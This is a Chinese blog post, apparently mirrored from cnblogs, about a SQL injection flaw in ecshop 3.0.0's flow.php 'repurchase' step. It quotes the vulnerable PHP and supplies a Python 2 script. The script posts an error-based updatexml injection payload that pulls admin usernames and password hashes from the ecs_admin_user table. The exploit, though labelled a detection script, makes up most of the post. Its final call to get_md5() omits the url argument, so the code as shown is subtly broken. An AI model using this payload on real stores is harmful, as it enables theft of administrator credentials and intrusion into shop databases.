zoukankan      html  css  js  c++  java
  • ecshop3.0.0注入

    配个环境来演示给别人看。。分析一下。flow.php文件缺陷,order_id在post请求没有单引号保护。造成注入

    <?php
    elseif ($_REQUEST['step'] == 'repurchase') {
        include_once('includes/cls_json.php');
        $order_id = strip_tags($_POST['order_id']);
        $order_id = json_str_iconv($order_id);
        $user_id = $_SESSION['user_id'];
        $json  = new JSON;
        $order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id);
        if (!$order) {
            $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
            die($json->encode($result));
        }
    
        $db->query('DELETE FROM ' .$ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE);
        $order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);
        $result = array('error' => 0, 'message' => '');
        foreach ($order_goods as $goods) {
            $spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);
            if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE)) {
                $result = false;
                $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
            }
        }
        die($json->encode($result));
    }
    

      

    ecshop3.0.0注入检测脚本:(无聊写了个脚本)

    #coding:utf-8
    #ecshop 3.0.0 flow.php sql injection
    #author:jwong 
     
    import requests
    import re
    import sys
     
    def get_md5(url):
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0"
        }
        payload = {"order_id":"1 or updatexml(1,(select concat(0x3a,user_name,0x3a,password,0x3e) from ecs_admin_user),1)#"
                  }
        urls = url + '/flow.php?step=repurchase'
     
        req = requests.post(urls,data=payload,headers=headers)
        print req.content
    
         
        if req.status_code == 200 and req:
            pattern = re.compile("XPATH syntax error: '(.*?)'")
            info = re.findall(pattern,req.content)[0]
            new_list = info.split(':')
            password = new_list[-1]
            username = new_list[1]
            print username + ':' + password
     
     
     
    if __name__ == '__main__':
        if len(sys.argv) < 2:
            print 'usage python ecshop.py url'
            exit()
        url = sys.argv[1]
        if 'http://' not in url:
            url = 'http://' + url
        get_md5()
    

      

      

  • 相关阅读:
    模式识别: 线性分类器
    Graph Cuts学习笔记2014.5.16----1
    图像处理程序框架—MFC相关知识点
    图像处理程序框架—MFC相关知识点
    【ML】人脸识别
    【视觉】两个赞的开发文档
    【调研】在总体为n的情况下,多少样本有代表性?
    【ubuntu】upload files
    【git】git pull
    【spark】with mongodb
  • 原文地址:https://www.cnblogs.com/whoami101/p/5848921.html
Copyright © 2011-2022 走看看